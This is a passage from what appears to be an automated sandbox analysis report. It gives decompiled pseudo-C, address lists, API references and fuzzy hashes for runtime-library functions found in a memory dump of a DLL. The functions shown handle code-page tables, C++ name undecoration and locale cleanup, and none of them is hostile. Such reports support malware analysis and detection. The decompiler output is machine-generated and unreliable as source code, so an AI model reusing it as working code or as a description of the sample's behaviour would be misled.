											E6E1D1BE4( *((intOrPtr*)(_t264 + 0x94)) - 0x80);
											E6E1D1BE4( *((intOrPtr*)(_t264 + 0x98)) - 0x80);
											E6E1D1BE4( *((intOrPtr*)(_t264 + 0x8c)));
										}
									}
									_t167 = _v52;
									 *_t167 = 1;
									 *((intOrPtr*)(_t264 + 0x8c)) = _t167;
									 *_t264 = _v72;
									 *((intOrPtr*)(_t264 + 0x90)) = _v76;
									 *((intOrPtr*)(_t264 + 0x94)) = _v80;
									 *((intOrPtr*)(_t264 + 0x98)) = _v84;
									 *(_t264 + 4) = _v60;
									L44:
									E6E1D1BE4(_v40);
									goto L48;
								}
								if( *(_t260 + 8) != 0xfde9) {
									_t256 =  &_v22;
									__eflags = _v22 - _t207;
									if(_v22 == _t207) {
										goto L39;
									}
									_t209 = _v32;
									while(1) {
										_t184 = _t256[1];
										__eflags = _t184;
										if(_t184 == 0) {
											break;
										}
										_t265 =  *_t256 & 0x000000ff;
										_v64 = _t265;
										__eflags = _t265 - (_t184 & 0x000000ff);
										if(_t265 > (_t184 & 0x000000ff)) {
											L37:
											_t256 =  &(_t256[2]);
											__eflags =  *_t256;
											if( *_t256 != 0) {
												continue;
											}
											break;
										}
										_v48 = _t238;
										_t187 = _t224 + 0x80 + _t265;
										_t239 = _t238 - _t224;
										__eflags = _t239;
										_t232 = _v64;
										_t266 = _t209 - 0xffffff00 + _t265 * 2;
										_v68 = _t187;
										_t211 = _t187;
										do {
											 *_t266 = 0x8000;
											_t266 = _t266 + 2;
											 *(_t239 + _t211) = _t232;
											 *_t211 = _t232;
											_t232 = _t232 + 1;
											_t211 =  &(_t211[0]);
											__eflags = _t232 - (_t256[1] & 0x000000ff);
										} while (_t232 <= (_t256[1] & 0x000000ff));
										_t238 = _v44;
										_t224 = _v36;
										_t209 = _v32;
										goto L37;
									}
									L38:
									_t207 = 0;
									goto L39;
								}
								_v44 = _t161 + 0x200;
								_t233 = _t238 + 0x100;
								_t258 = _t224 - _t238;
								_t191 = 0xffffff80;
								_v48 = _t191 - _t238;
								do {
									_push(0x32);
									asm("sbb eax, eax");
									_v44 = _v44 + 2;
									 *_v44 = (0xfffffebe + _t233 & 0xffff8000) + 0x8000;
									_t214 = _v48;
									_t196 = _t233 + _t214;
									 *_t233 = _t196;
									 *((char*)(_t258 + _t233)) = _t196;
									_t233 = _t233 + 1;
								} while (_t214 + _t233 <= 0xff);
								goto L38;
							}
							_t290 =  *(_t260 + 8) - 0xfde9;
							if( *(_t260 + 8) != 0xfde9) {
								_t240 =  &_v22;
								__eflags = _v22 - _t207;
								if(__eflags == 0) {
									goto L22;
								}
								_t234 = _v40;
								while(1) {
									_t198 = _t240[1];
									__eflags = _t198;
									if(__eflags == 0) {
										break;
									}
									_t269 =  *_t240 & 0x000000ff;
									__eflags = _t269 - (_t198 & 0x000000ff);
									if(_t269 > (_t198 & 0x000000ff)) {
										L20:
										_t240 =  &(_t240[2]);
										__eflags =  *_t240 - _t207;
										if(__eflags != 0) {
											continue;
										}
										break;
									} else {
										goto L19;
									}
									do {
										L19:
										 *((char*)(_t269 + _t234)) = 0x20;
										_t269 = _t269 + 1;
										__eflags = _t269 - (_t240[1] & 0x000000ff);
									} while (_t269 <= (_t240[1] & 0x000000ff));
									goto L20;
								}
								_t260 = _v56;
								goto L22;
							}
							E6E1AD830(_t242, _v40 - 0xffffff80, 0x20, 0x80);
							_t272 = _t272 + 0xc;
							goto L22;
						}
					}
				}
				_push(_t131);
				_push(0x1004);
				_push(_t215);
				_push(0);
				_push( &_v92);
				_t205 = E6E1D3A02(0, __edx, 0, _t260, __fp0);
				_t272 = _t271 + 0x14;
				if(_t205 != 0) {
					goto L43;
				}
				goto L3;
			}

0x6e1c2566
0x6e1c256e
0x6e1c2575
0x6e1c257a
0x6e1c257d
0x6e1c2580
0x6e1c2583
0x6e1c2585
0x6e1c2588
0x6e1c258e
0x6e1c2591
0x6e1c2594
0x6e1c2597
0x6e1c259c
0x6e1c297f
0x6e1c2981
0x6e1c2983
0x6e1c2983
0x6e1c2986
0x6e1c298c
0x6e1c298e
0x6e1c2994
0x6e1c299a
0x6e1c29a4
0x6e1c29ae
0x6e1c29b5
0x6e1c29c3
0x6e1c29c3
0x6e1c25a2
0x6e1c25a5
0x6e1c25aa
0x6e1c25c8
0x6e1c25d2
0x6e1c25d5
0x6e1c25e8
0x6e1c25eb
0x6e1c25f8
0x6e1c25fb
0x6e1c25fe
0x6e1c2610
0x6e1c2613
0x6e1c2625
0x6e1c2628
0x6e1c262d
0x6e1c2633
0x6e1c2948
0x6e1c294b
0x6e1c2953
0x6e1c2959
0x6e1c2961
0x6e1c296b
0x6e1c296b
0x00000000
0x6e1c2642
0x6e1c2642
0x6e1c2647
0x00000000
0x6e1c265e
0x6e1c265e
0x6e1c2660
0x6e1c2660
0x6e1c2663
0x6e1c2664
0x6e1c267a
0x00000000
0x00000000
0x6e1c2680
0x6e1c2686
0x00000000
0x00000000
0x6e1c268c
0x6e1c268f
0x6e1c2695
0x6e1c26eb
0x6e1c26ee
0x6e1c270d
0x6e1c2711
0x6e1c2716
0x6e1c2719
0x6e1c271b
0x00000000
0x00000000
0x6e1c2744
0x6e1c2749
0x6e1c274c
0x6e1c274e
0x00000000
0x00000000
0x6e1c2769
0x6e1c276f
0x6e1c2774
0x6e1c2779
0x00000000
0x00000000
0x6e1c277f
0x6e1c2788
0x6e1c278e
0x6e1c2791
0x6e1c2794
0x6e1c2797
0x6e1c279a
0x6e1c27a0
0x6e1c27a3
0x6e1c27a6
0x6e1c27a9
0x6e1c27ab
0x6e1c27b1
0x6e1c27b4
0x6e1c27b6
0x6e1c2886
0x6e1c288d
0x6e1c288e
0x6e1c2899
0x6e1c289c
0x6e1c289e
0x6e1c28a8
0x6e1c28ab
0x6e1c28ad
0x6e1c28b6
0x6e1c28b8
0x6e1c28ba
0x6e1c28bb
0x6e1c28c6
0x6e1c28cb
0x6e1c28cf
0x6e1c28dd
0x6e1c28f0
0x6e1c28fe
0x6e1c2909
0x6e1c290e
0x6e1c28cf
0x6e1c2911
0x6e1c2914
0x6e1c291a
0x6e1c2923
0x6e1c2928
0x6e1c2931
0x6e1c293a
0x6e1c2943
0x6e1c296c
0x6e1c296f
0x00000000
0x6e1c2975
0x6e1c27c3
0x6e1c281c
0x6e1c281f
0x6e1c2822
0x00000000
0x00000000
0x6e1c2824
0x6e1c2827
0x6e1c2827
0x6e1c282a
0x6e1c282c
0x00000000
0x00000000
0x6e1c282e
0x6e1c2834
0x6e1c2837
0x6e1c2839
0x6e1c287c
0x6e1c287c
0x6e1c287f
0x6e1c2882
0x00000000
0x00000000
0x00000000
0x6e1c2882
0x6e1c2841
0x6e1c284a
0x6e1c284c
0x6e1c284c
0x6e1c284e
0x6e1c2851
0x6e1c2854
0x6e1c2857
0x6e1c2859
0x6e1c285e
0x6e1c2861
0x6e1c2864
0x6e1c2867
0x6e1c2869
0x6e1c286e
0x6e1c286f
0x6e1c286f
0x6e1c2873
0x6e1c2876
0x6e1c2879
0x00000000
0x6e1c2879
0x6e1c2884
0x6e1c2884
0x00000000
0x6e1c2884
0x6e1c27cc
0x6e1c27cf
0x6e1c27dc
0x6e1c27de
0x6e1c27e3
0x6e1c27e6
0x6e1c27e9
0x6e1c27f1
0x6e1c27f3
0x6e1c2801
0x6e1c2804
0x6e1c2807
0x6e1c280a
0x6e1c280c
0x6e1c280f
0x6e1c2813
0x00000000
0x6e1c281a
0x6e1c2697
0x6e1c269e
0x6e1c26b8
0x6e1c26bb
0x6e1c26be
0x00000000
0x00000000
0x6e1c26c0
0x6e1c26c3
0x6e1c26c3
0x6e1c26c6
0x6e1c26c8
0x00000000
0x00000000
0x6e1c26ca
0x6e1c26d0
0x6e1c26d2
0x6e1c26e1
0x6e1c26e1
0x6e1c26e4
0x6e1c26e6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1c26d4
0x6e1c26d4
0x6e1c26d4
0x6e1c26d8
0x6e1c26dd
0x6e1c26dd
0x00000000
0x6e1c26d4
0x6e1c26e8
0x00000000
0x6e1c26e8
0x6e1c26ae
0x6e1c26b3
0x00000000
0x6e1c26b3
0x6e1c2647
0x6e1c2633
0x6e1c25ac
0x6e1c25ad
0x6e1c25b2
0x6e1c25b6
0x6e1c25b7
0x6e1c25b8
0x6e1c25bd
0x6e1c25c2
0x00000000
0x00000000
0x00000000

APIs

_free.LIBCMT ref: 6E1C25D5
_free.LIBCMT ref: 6E1C25EB
_free.LIBCMT ref: 6E1C25FE
_free.LIBCMT ref: 6E1C2613
_free.LIBCMT ref: 6E1C2628
GetCPInfo.KERNEL32(?,?), ref: 6E1C2672

Part of subcall function 6E1D3A02: _free.LIBCMT ref: 6E1D3A6D

_free.LIBCMT ref: 6E1C28DD
_free.LIBCMT ref: 6E1C28F0
_free.LIBCMT ref: 6E1C28FE
_free.LIBCMT ref: 6E1C2909
_free.LIBCMT ref: 6E1C294B
_free.LIBCMT ref: 6E1C2953
_free.LIBCMT ref: 6E1C2959
_free.LIBCMT ref: 6E1C2961
_free.LIBCMT ref: 6E1C296F

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: bd88b7067e08fff1e498b310a18415ebc5bb319ce4cce867cf012ff842668b48
Instruction ID: f9684dd90191b24d49aeac8bf8c82fe4df0835fb38d07cd6cdc92e832746e62b
Opcode Fuzzy Hash: bd88b7067e08fff1e498b310a18415ebc5bb319ce4cce867cf012ff842668b48
Instruction Fuzzy Hash: CAD1BF71A007169FDB11CFE8C880BEEBBF5BF18704F144529E895E7281D774A889EB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B3CFA, Relevance: 19.8, APIs: 13, Instructions: 301
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E6E1B3CFA(void* __edx, signed int* _a4) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				char _v60;
				intOrPtr _v64;
				char* _v68;
				char _v76;
				char _v84;
				char _v92;
				char _v100;
				char _v108;
				char _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v148;
				char _v156;
				char _v164;
				char _v172;
				char _v180;
				char _v188;
				char _v196;
				char _v204;
				char _v212;
				char _v220;
				char _v228;
				char _v236;
				char _v244;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t90;
				intOrPtr _t91;
				intOrPtr* _t92;
				intOrPtr _t93;
				signed int* _t96;
				char* _t99;
				void* _t101;
				signed int* _t102;
				void* _t106;
				void* _t109;
				void* _t118;
				void* _t122;
				void* _t125;
				char* _t129;
				void* _t131;
				void* _t132;
				void* _t135;
				char* _t141;
				void* _t144;
				intOrPtr* _t153;
				signed int _t164;
				char* _t174;
				signed int* _t176;
				char* _t177;
				intOrPtr* _t182;
				signed int* _t186;
				signed int* _t191;
				signed int _t196;
				signed int* _t199;
				void* _t203;
				void* _t204;
				signed int* _t206;
				void* _t207;

				_t203 = __edx;
				_t206 = _a4;
				 *_t206 =  *_t206 & 0x00000000;
				_t206[1] = _t206[1] & 0x00000000;
				_t164 = 0;
				while(1) {
					_t90 =  *0x6e221b68; // 0x0
					_t91 =  *_t90;
					if(_t91 == 0 || _t91 == 0x40) {
						break;
					}
					if( *0x6e221b74 == 0 ||  *0x6e221b75 != 0) {
						if( *_t206 != 0) {
							_v44 = "::";
							_v40 = 2;
							_t185 = E6E1AF764( &_v108,  &_v44);
							E6E1AFB8D(_t156,  &_v52, _t206);
							 *_t206 = _v52;
							_t206[1] = _v48;
							if(_t164 != 0) {
								_t186 = E6E1AFB1E(_t185,  &_v116, 0x5b, _t206);
								_t207 = _t207 + 0xc;
								_t164 = 0;
								 *_t206 =  *_t186;
								_t206[1] = _t186[1];
							}
						}
						_t99 =  *0x6e221b68; // 0x0
						if( *_t99 != 0x3f) {
							_t101 = E6E1B5444(_t164, _t203, _t204, _t206,  &_v92, 1, 0);
							_t174 =  &_v100;
							L36:
							_t207 = _t207 + 0xc;
							L37:
							_t102 = E6E1AFB8D(_t101, _t174, _t206);
							L38:
							_t176 = _t102;
							 *_t206 =  *_t176;
							_t206[1] = _t176[1];
							L39:
							if(_t206[1] == 0) {
								continue;
							}
							break;
						}
						_t15 = _t99 + 1; // 0x1
						_t177 = _t15;
						 *0x6e221b68 = _t177;
						_t106 =  *_t177 - 0x24;
						if(_t106 == 0) {
							_t71 = _t177 - 1; // 0x0
							 *0x6e221b68 = _t71;
							_t101 = E6E1B5444(_t164, _t203, _t204, _t206,  &_v244, 1, 0);
							_t174 =  &_v84;
							goto L36;
						}
						_t109 = _t106 - 1;
						if(_t109 == 0) {
							L32:
							E6E1AF6E4( &_v76, 0x6e221b68, 0x40);
							_v68 = "`anonymous namespace\'";
							_v64 = 0x15;
							E6E1AFB8D(E6E1AF764( &_v236,  &_v68),  &_v20, _t206);
							 *_t206 = _v20;
							_t206[1] = _v16;
							_t182 =  *0x6e221b60; // 0x0
							__eflags =  *_t182 - 9;
							if(__eflags != 0) {
								E6E1AFDD7(_t182,  &_v76);
							}
							goto L39;
						}
						_t118 = _t109 - 0x1a;
						if(_t118 == 0) {
							__eflags =  *((char*)(_t177 + 1)) - 0x5f;
							if( *((char*)(_t177 + 1)) != 0x5f) {
								L31:
								_push( &_v204);
								_t122 = E6E1AFB1E(_t177,  &_v212, 0x60, E6E1B2085(_t164, _t204, _t206));
								_t207 = _t207 + 0x10;
								_t101 = E6E1AFBAF(_t122,  &_v220, 0x27);
								_t174 =  &_v228;
								goto L37;
							}
							__eflags =  *((char*)(_t177 + 2)) - 0x3f;
							if( *((char*)(_t177 + 2)) != 0x3f) {
								goto L31;
							}
							_t52 = _t177 + 1; // 0x2
							 *0x6e221b68 = _t52;
							_t125 = E6E1B2FDD(_t203,  &_v188, 0, 0);
							_t207 = _t207 + 0xc;
							_t191 = E6E1AFB8D(_t125,  &_v196, _t206);
							 *_t206 =  *_t191;
							_t206[1] = _t191[1];
							_t129 =  *0x6e221b68; // 0x0
							__eflags =  *_t129 - 0x40;
							if(__eflags != 0) {
								goto L39;
							}
							L30:
							 *0x6e221b68 =  *0x6e221b68 + 1;
							goto L39;
						}
						_t131 = _t118;
						if(_t131 == 0) {
							goto L32;
						}
						_t132 = _t131 - 8;
						if(_t132 == 0) {
							_t46 = _t177 + 1; // 0x2
							 *0x6e221b68 = _t46;
							_t135 = E6E1B5444(_t164, _t203, _t204, _t206,  &_v164, 1, 0);
							_t207 = _t207 + 0xc;
							_t102 = E6E1AFB8D(E6E1AFBAF(_t135,  &_v172, 0x5d),  &_v180, _t206);
							_t164 = 1;
							goto L38;
						}
						_t222 = _t132 == 8;
						if(_t132 == 8) {
							_t18 = _t177 + 1; // 0x2
							_t19 =  &_v8;
							 *_t19 = _v8 & 0;
							__eflags =  *_t19;
							_v12 = 0;
							 *0x6e221b68 = _t18;
							while(1) {
								E6E1B5444(_t164, _t203, 0, _t206,  &_v36, 1, 0);
								_t196 = _v32;
								_t207 = _t207 + 0xc;
								__eflags = _t196;
								if(_t196 != 0) {
									_t196 = 2;
									_t204 = 0;
									__eflags = 0;
								} else {
									__eflags = 0;
									if(0 == 0) {
										_t204 = _v36;
									} else {
										_v28 = _v36;
										_v24 = _t196;
										_v60 = "::";
										_v56 = 2;
										E6E1AFC2F( &_v28,  &_v60);
										_t153 = E6E1AFB8D( &_v28,  &_v140,  &_v12);
										_t204 =  *_t153;
										_t196 =  *(_t153 + 4);
									}
								}
								_v8 = _t196;
								_v12 = _t204;
								__eflags = _t196;
								if(__eflags != 0) {
									break;
								}
								_t141 =  *0x6e221b68; // 0x0
								__eflags =  *_t141 - 0x40;
								if( *_t141 != 0x40) {
									continue;
								}
								_t144 = E6E1AFB1E(_t196,  &_v148, 0x5b,  &_v12);
								_t207 = _t207 + 0xc;
								_t199 = E6E1AFBAF(_t144,  &_v156, 0x5d);
								 *_t206 =  *_t199;
								_t206[1] = _t199[1];
								goto L30;
							}
							_t206[1] = _t206[1] & 0x00000000;
							 *_t206 =  *_t206 & 0x00000000;
							_t206[1] = 2;
							goto L39;
						} else {
							_t101 = E6E1B2E6D(_t177, _t203, _t204, _t222,  &_v124);
							_t174 =  &_v132;
							goto L37;
						}
					} else {
						L46:
						return _t206;
					}
				}
				_t92 =  *0x6e221b68; // 0x0
				_t93 =  *_t92;
				if(_t93 == 0) {
					__eflags =  *_t206;
					_push(1);
					if( *_t206 != 0) {
						_v20 = "::";
						_v16 = 2;
						_t96 = E6E1AFB8D(E6E1AFB6B(E6E1AF804( &_v100),  &_v92,  &_v20),  &_v84, _t206);
						 *_t206 =  *_t96;
						_t206[1] = _t96[1];
					} else {
						E6E1AFA80(_t206);
					}
				} else {
					if(_t93 != 0x40) {
						_t206[1] = _t206[1] & 0x00000000;
						 *_t206 =  *_t206 & 0x00000000;
						_t206[1] = 2;
					}
				}
				goto L46;
			}

0x6e1b3cfa
0x6e1b3d05
0x6e1b3d09
0x6e1b3d0c
0x6e1b3d10
0x6e1b3d12
0x6e1b3d12
0x6e1b3d17
0x6e1b3d1b
0x00000000
0x00000000
0x6e1b3d30
0x6e1b3d42
0x6e1b3d47
0x6e1b3d52
0x6e1b3d63
0x6e1b3d65
0x6e1b3d6d
0x6e1b3d72
0x6e1b3d77
0x6e1b3d85
0x6e1b3d87
0x6e1b3d8a
0x6e1b3d8e
0x6e1b3d93
0x6e1b3d93
0x6e1b3d77
0x6e1b3d96
0x6e1b3d9e
0x6e1b4014
0x6e1b4019
0x6e1b401c
0x6e1b401c
0x6e1b401f
0x6e1b4023
0x6e1b4028
0x6e1b4028
0x6e1b402c
0x6e1b4031
0x6e1b4034
0x6e1b4038
0x00000000
0x00000000
0x00000000
0x6e1b4038
0x6e1b3da4
0x6e1b3da4
0x6e1b3da7
0x6e1b3db0
0x6e1b3db3
0x6e1b3fef
0x6e1b3ff4
0x6e1b4002
0x6e1b4007
0x00000000
0x6e1b4007
0x6e1b3db9
0x6e1b3dbc
0x6e1b3f96
0x6e1b3fa0
0x6e1b3fa8
0x6e1b3fb6
0x6e1b3fc9
0x6e1b3fd1
0x6e1b3fd6
0x6e1b3fd9
0x6e1b3fdf
0x6e1b3fe2
0x6e1b3fe8
0x6e1b3fe8
0x00000000
0x6e1b3fe2
0x6e1b3dc2
0x6e1b3dc5
0x6e1b3f02
0x6e1b3f06
0x6e1b3f5d
0x6e1b3f63
0x6e1b3f73
0x6e1b3f78
0x6e1b3f86
0x6e1b3f8b
0x00000000
0x6e1b3f8b
0x6e1b3f08
0x6e1b3f0c
0x00000000
0x00000000
0x6e1b3f0e
0x6e1b3f13
0x6e1b3f21
0x6e1b3f26
0x6e1b3f38
0x6e1b3f3c
0x6e1b3f41
0x6e1b3f44
0x6e1b3f49
0x6e1b3f4c
0x00000000
0x00000000
0x6e1b3f52
0x6e1b3f52
0x00000000
0x6e1b3f52
0x6e1b3dcc
0x6e1b3dcf
0x00000000
0x00000000
0x6e1b3dd5
0x6e1b3dd8
0x6e1b3ec1
0x6e1b3ec6
0x6e1b3ed4
0x6e1b3ed9
0x6e1b3ef6
0x6e1b3efb
0x00000000
0x6e1b3efb
0x6e1b3dde
0x6e1b3de1
0x6e1b3df7
0x6e1b3dfa
0x6e1b3dfa
0x6e1b3dfa
0x6e1b3dfd
0x6e1b3e00
0x6e1b3e05
0x6e1b3e0d
0x6e1b3e12
0x6e1b3e15
0x6e1b3e18
0x6e1b3e1a
0x6e1b3e64
0x6e1b3e65
0x6e1b3e65
0x6e1b3e1c
0x6e1b3e1c
0x6e1b3e1e
0x6e1b3e5d
0x6e1b3e20
0x6e1b3e23
0x6e1b3e29
0x6e1b3e30
0x6e1b3e37
0x6e1b3e3e
0x6e1b3e51
0x6e1b3e56
0x6e1b3e58
0x6e1b3e58
0x6e1b3e1e
0x6e1b3e67
0x6e1b3e6a
0x6e1b3e6d
0x6e1b3e6f
0x00000000
0x00000000
0x6e1b3e71
0x6e1b3e76
0x6e1b3e79
0x00000000
0x00000000
0x6e1b3e88
0x6e1b3e8d
0x6e1b3ea0
0x6e1b3ea4
0x6e1b3ea9
0x00000000
0x6e1b3ea9
0x6e1b3eb1
0x6e1b3eb5
0x6e1b3eb8
0x00000000
0x6e1b3de3
0x6e1b3de7
0x6e1b3ded
0x00000000
0x6e1b3ded
0x6e1b40a6
0x6e1b40a6
0x6e1b40ab
0x6e1b40ab
0x6e1b3d30
0x6e1b403e
0x6e1b4043
0x6e1b4047
0x6e1b405a
0x6e1b405d
0x6e1b405f
0x6e1b406d
0x6e1b4074
0x6e1b4096
0x6e1b409d
0x6e1b40a2
0x6e1b4061
0x6e1b4063
0x6e1b4063
0x6e1b4049
0x6e1b404b
0x6e1b404d
0x6e1b4051
0x6e1b4054
0x6e1b4054
0x6e1b404b
0x00000000

APIs

DName::operator+.LIBCMT ref: 6E1B3D65
DName::operator+.LIBCMT ref: 6E1B3E9B

Part of subcall function 6E1AFC2F: shared_ptr.LIBCMT ref: 6E1AFC4B

DName::operator+.LIBCMT ref: 6E1B3EE7
DName::operator+.LIBCMT ref: 6E1B3EF6
DName::operator+.LIBCMT ref: 6E1B3E51

Part of subcall function 6E1B5444: DName::operator=.LIBVCRUNTIME ref: 6E1B54D3

DName::operator+.LIBCMT ref: 6E1B4023
DName::operator=.LIBVCRUNTIME ref: 6E1B4063
DName::DName.LIBVCRUNTIME ref: 6E1B407B
DName::operator+.LIBCMT ref: 6E1B408A
DName::operator+.LIBCMT ref: 6E1B4096

Part of subcall function 6E1B5444: Replicator::operator[].LIBVCRUNTIME ref: 6E1B5481

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
String ID:
API String ID: 1026175760-0
Opcode ID: d06499ccefb6932379f15f194ead770fca35c2c8d8ce307dadbb29a45b416ad7
Instruction ID: 910f3e3792d18726a14b034b9eac4d2d3320d6b1c75b432a9f9fbceabc654f1e
Opcode Fuzzy Hash: d06499ccefb6932379f15f194ead770fca35c2c8d8ce307dadbb29a45b416ad7
Instruction Fuzzy Hash: 40C18F719042099FDB54CFE8C858BEEBBF9AB19304F10445EE25AA7280EB7199C9DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DD508, Relevance: 19.6, APIs: 13, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1DD508(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6e218070) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6E1D1BE4(_t46);
							E6E1DD825( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6E1D1BE4(_t47);
							E6E1DDD12( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6E1D1BE4( *((intOrPtr*)(_t74 + 0x7c)));
						E6E1D1BE4( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6E1D1BE4( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6E1D1BE4( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6E1D1BE4( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6E1D1BE4( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6E1DD679( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6e218258) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6E1D1BE4(_t31);
							E6E1D1BE4( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6E1D1BE4(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6E1D1BE4(_t74);
			}

0x6e1dd510
0x6e1dd514
0x6e1dd51c
0x6e1dd525
0x6e1dd52a
0x6e1dd531
0x6e1dd539
0x6e1dd541
0x6e1dd54c
0x6e1dd552
0x6e1dd553
0x6e1dd55b
0x6e1dd563
0x6e1dd56e
0x6e1dd574
0x6e1dd578
0x6e1dd583
0x6e1dd589
0x6e1dd52a
0x6e1dd58a
0x6e1dd592
0x6e1dd5a5
0x6e1dd5b8
0x6e1dd5c6
0x6e1dd5d1
0x6e1dd5d6
0x6e1dd5df
0x6e1dd5e7
0x6e1dd5e8
0x6e1dd5ee
0x6e1dd5f1
0x6e1dd5f4
0x6e1dd5fb
0x6e1dd5fd
0x6e1dd601
0x6e1dd609
0x6e1dd610
0x6e1dd616
0x6e1dd617
0x6e1dd617
0x6e1dd61e
0x6e1dd620
0x6e1dd625
0x6e1dd62d
0x6e1dd632
0x6e1dd633
0x6e1dd633
0x6e1dd636
0x6e1dd639
0x6e1dd63c
0x6e1dd63f
0x6e1dd63f
0x6e1dd64f

APIs

___free_lconv_mon.LIBCMT ref: 6E1DD54C

Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD842
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD854
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD866
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD878
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD88A
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD89C
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD8AE
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD8C0
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD8D2
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD8E4
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD8F6
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD908
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD91A

_free.LIBCMT ref: 6E1DD541

Part of subcall function 6E1D1BE4: HeapFree.KERNEL32(00000000,00000000,?,6E1DDFED,?,00000000,?,?,?,6E1DE2F1,?,00000007,?,?,6E1DD69F,?), ref: 6E1D1BFA
Part of subcall function 6E1D1BE4: GetLastError.KERNEL32(?,?,6E1DDFED,?,00000000,?,?,?,6E1DE2F1,?,00000007,?,?,6E1DD69F,?,?), ref: 6E1D1C0C

_free.LIBCMT ref: 6E1DD563
_free.LIBCMT ref: 6E1DD578
_free.LIBCMT ref: 6E1DD583
_free.LIBCMT ref: 6E1DD5A5
_free.LIBCMT ref: 6E1DD5B8
_free.LIBCMT ref: 6E1DD5C6
_free.LIBCMT ref: 6E1DD5D1
_free.LIBCMT ref: 6E1DD609
_free.LIBCMT ref: 6E1DD610
_free.LIBCMT ref: 6E1DD62D
_free.LIBCMT ref: 6E1DD645

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
